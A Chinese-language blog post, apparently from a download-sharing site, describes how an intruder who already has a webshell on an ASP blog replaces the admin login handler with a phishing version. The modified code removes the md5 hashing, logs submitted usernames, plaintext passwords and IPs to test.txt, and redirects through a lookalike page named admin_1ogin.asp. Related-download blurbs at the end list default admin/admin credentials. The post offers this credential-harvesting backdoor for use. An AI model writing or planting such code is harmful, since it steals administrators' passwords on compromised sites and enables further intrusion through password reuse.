在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。
下载了数据库,但是md5密码没办法解密。唉,看来只要记录他的登录管理员 账号密码了!
省得还要去穷取法破解!
这个密码其实说重要也不重要 说不 重要 其实很重要。
因为很多人喜欢使用相同密码。即使是我这类安全检测人员,也免不了使用同一种账号密码的习惯。
首先看看他的后台登陆代码
<%
Dim Login
Set Login=new AdLogin
Login.Execute
Class AdLogin
Private ExCommCls
Private Sub class_initialize
Set CommCls=new CommonCls
ExCommCls.IsIpAllow
ExCommCls.CheckInstall
ExCommCls.GetConfigCache("*")
End Sub
Private Sub class_terminate
Set ExCommCls=nothing
End Sub
public Sub Execute
Dim Action
Action=Request("action")
Select Case Action
Case "CheckLogin"
CheckLogin
Case "LoginOut"
LoginOut
Case Else
LoginF
End Select
End Sub
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=md5(Trim(request("AdPwd")))
CheckCode=ExCommCls.G(request("checkCode"))
If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
ExCommCls.ShowMsg "验证码错误!",Application(sn&"blogurl")&"admin_login.asp"
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
Response.Cookies(Md5(SN))("AdName")=AdName
Response.Cookies(Md5(SN))("AdPwd")=AdPwd
session("AdLogin")=Md5(SN)
ExCommCls.GetConfigCache("*")
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&"blogurl")&"admin_index.asp")
Else
ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"admin_login.asp"
End if
End Sub
Private Sub LoginOut
Response.Cookies(Md5(SN))("AdName")=""
Response.Cookies(Md5(SN))("AdPwd")=""
session.Abandon()
ExCommCls.ShowMsg "成功退出登陆",Application(sn&"blogurl")&"index.asp"
End Sub
Private Sub LoginF
%>
看下列代码
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=md5(Trim(request("AdPwd")))
---意思很简单,这里就不明说了, 主要看md5 ,密码使用md5加密 这样的话,我们记录的密码也就没用了,还是md5。所以
所以想到了,一个钓鱼手法。 它本来的登录界面是
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=(Trim(request("AdPwd")))
CheckCode=ExCommCls.G(request("checkCode"))
strLogFile="test.txt"
IP=request("IP")
StrLogText=StrLogText&AdName&"----"&AdPwd&"----IP:"&IP&("REMOTE_HOST")
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
ExCommCls.ShowMsg "验证码错误!",Application(sn&"blogurl")&"Admin_1ogin.asp"
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
Response.Cookies(Md5(SN))("AdName")=AdName
Response.Cookies((SN))("AdPwd")=AdPwd
session("AdLogin")=Md5(SN)
ExCommCls.GetConfigCache("*")
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&"blogurl")&"Admin_1ogin.asp")
Else
ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"Admin_1ogin.asp"
End if
End Sub
看到没,
a=本来的登录页面 现在换成了钓鱼页面
b=本来的登录页面(admin_login.asp)修改成admin_1ogin.asp
为什么呢。
本来的: AdPwd=md5(Trim(request("AdPwd")))
Response.Cookies(Md5(SN))("AdPwd")=AdPwd
修改
AdPwd=(Trim(request("AdPwd")))
Response.Cookies((SN))("AdPwd")=AdPwd
去掉md5。。这样的迷惑手法,使用很久了!。。
没什么技术含量。 还请不要见笑!密码会记录在test.txt上
细心总是好的!
分享到:
相关推荐
3.个人信息:管理员和员工可查看和修改自己的个人信息和账号密码 4.银行卡管理:管理员和员工可查看修改自己的银行卡信息,管理员也可查看员工银行卡信息 5、用户操作:管理员可添加用户、查看用户信息、修改用户...
客户关系拓展管理平台 有以下主要功能模块 系统管理 上传我司标志 设置操作权限 ...默认管理员账号密码均为51aspx 内置手机短信发送功能,密码采取Base64位加解密 该项目由Asp.net1.1转换到Asp.net2.0
一、源码特点 asp.net 停车场管理系统管理系统 ... 1、管理员账号:admin 密码:a 2、开发环境为vs2010,数据库为sqlserver2008,使用c#语言开发。 3、数据库文件名carParkDB_data.mdf 4.系统首页地址:login.aspx
管理员操作说明 1-1、管理员从“管理页面”进行后台登陆,新系统默认系统管理员帐号和密码为admin和admin。 1-2、为了增加系统安全,登陆后请你马上到“管理页面-修改密码”... 管理地址admin_login.asp 账号密码admin
3.个人信息:管理员和员工可查看和修改自己的个人信息和账号密码 4.银行卡管理:管理员和员工可查看修改自己的银行卡信息,管理员也可查看员工银行卡信息 5、用户操作:管理员可添加用户、查看用户信息、修改用户...
1、管理员账号:admin 密码:admin 2、开发环境为vs2010,数据库为sqlserver2008,使用c#语言开发。 3、数据库文件名是netqiche.mdf ,系统名称qiche 数据库文件在 App_Data下 4.登录地址:login.aspx
# ASPNET_Teaching_material_management ...## 2、管理员:管理员利用管理员账号、密码进行登录,登录后对文件进行发布、查找、删除。 (1)教学日历管理 (2)教学资料管理 (3)借阅管理 (4)研讨会会议记录管理
我们通过调研美容美发行业,开发了如下功能的会员卡与收银软件 适用于美容美发的会员卡管理与收银管理 软件开发商:汇成软件 前台测试帐号与密码都是:user 后台测试帐号与密码都是:admin ...9.管理员帐号管理
1) 前台报名提交:可以根据所选择的项目,提交自己的姓名,身份证号码,性别,籍贯,政治面貌,电子邮件,家庭住址,而且这些项目都可以在后台自由...7) 完整的记录管理员操作日志,便于超级管理员掌控整个系统的安全性
2 后台管理页面的 添加管理员 页面增加 [压缩数据库] [备份数据库] [还原数据库] [系统空间占用] 功能。 3 所有页面的网址和名字都结合在config.asp里了。用代码调用了。只需改这个文件里中间那些字改成你自己的就...
一、源码特点 ... 1、管理员账号:admin 密码:admin 2、开发环境为vs2010,数据库为sqlserver2008,或者以上版本都可以,使用c#语言开发。 3、数据库文件名是netfcrm.mdf 4.登录地址:login.aspx
一、源码特点 asp.net 教务管理系统 是一套完善的... 1、管理员账号:admin 密码:admin 2、开发环境为vs2010,数据库为sqlserver2005,使用c#语言开发。 3、数据库文件名是netjwgl.mdf 4.登录地址:login.aspx
系统开发环境: vs2005以上版本 + sqlserver2000以上版本 数据库文件:数据库目录下的Hotel_Data.MDF ...只有管理员可以添加,删除用户记录信息。 (6)密码修改:登陆系统的用户可以修改自己的登录密码
功能介绍: 订单管理:管理员可通过点击查看,看到订单详细信息,如姓名、地址、电话、订单来源、备注等信息,管理员可添加备注信息,对订单做处理记录。 手机、IP归属地查询: 收发邮件管理:(手机邮箱支持短信...
config中字段reg_number不会清0的漏洞解决:Bug1已修正Bug2已修正,修正了control/show_detail_info.asp文件在Global全局类的Template修正了ParseTag函数了变量sTag定义错误在install.asp中修改了添加账号密码后的...
一、源码特点 ... 1、管理员账号:admin 密码:admin 2、开发环境为vs2010,数据库为sqlserver2008,或者以上版本都可以,使用c#语言开发。 3、数据库文件名是netfksap.mdf 4.登录地址:login.aspx
2 后台管理页面的 添加管理员 页面增加 [压缩数据库] [备份数据库] [还原数据库] [系统空间占用] 功能。 3 所有页面的网址和名字都结合在config.asp里了。用代码调用了。只需改这个文件里中间那些字改成你自己的就...
一、源码特点 ASP.NET C# 日志管理系统 是... 1、管理员账号:admin 密码:admin 2、开发环境为vs2010,数据库为sqlserver2008,使用c#语言开发。 3、数据库文件名aspnetrizhi.mdf 4.系统首页地址:login.aspx
一、源码特点 ... 1、管理员账号:admin 密码:1 2、开发环境为vs2010,数据库为ACCESS,使用c#语言开发。 3、数据库文件名是projects.mdb , 数据库文件在Web/DB 下 4.登录地址:Web/login.aspx
2.管理员密码账号管理 3.管理员添加,修改,删除 4.数据库备份,压缩,恢复,软件空间占用 5.姓名,像片规格,曾 用 名 ,性别,出生日期,免冠照片,学号,所在集体,身份证号,入学学历,政治面貌 入学日期,加入组织,日期, ...